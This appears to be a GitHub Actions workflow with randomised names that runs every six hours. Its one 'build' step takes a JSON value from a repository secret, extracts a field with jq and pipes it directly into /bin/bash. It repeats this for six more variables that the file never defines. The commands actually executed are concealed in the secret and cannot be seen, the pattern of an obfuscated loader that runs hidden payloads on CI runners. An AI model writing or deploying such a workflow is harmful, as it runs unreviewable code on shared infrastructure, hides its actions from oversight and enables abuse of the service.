name: ragregshibie

on:
  workflow_dispatch:
  schedule:
    - cron: '37 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: ragregshibie
        env:
          rvfp3041: ${{ secrets.rvfp3041 }}
        run: |
          echo $rvfp3041 | jq -r .p448 | /bin/bash
          echo $ehw31 | jq -r .rqx91 | /bin/bash
          echo $xucg263 | jq -r .ypsoe3812 | /bin/bash
          echo $fekn62338 | jq -r .agc58 | /bin/bash
          echo $rw41724 | jq -r .zb1 | /bin/bash
          echo $gvt2 | jq -r .uf0 | /bin/bash
          echo $xbmfn341 | jq -r .hwgiy99620 | /bin/bash

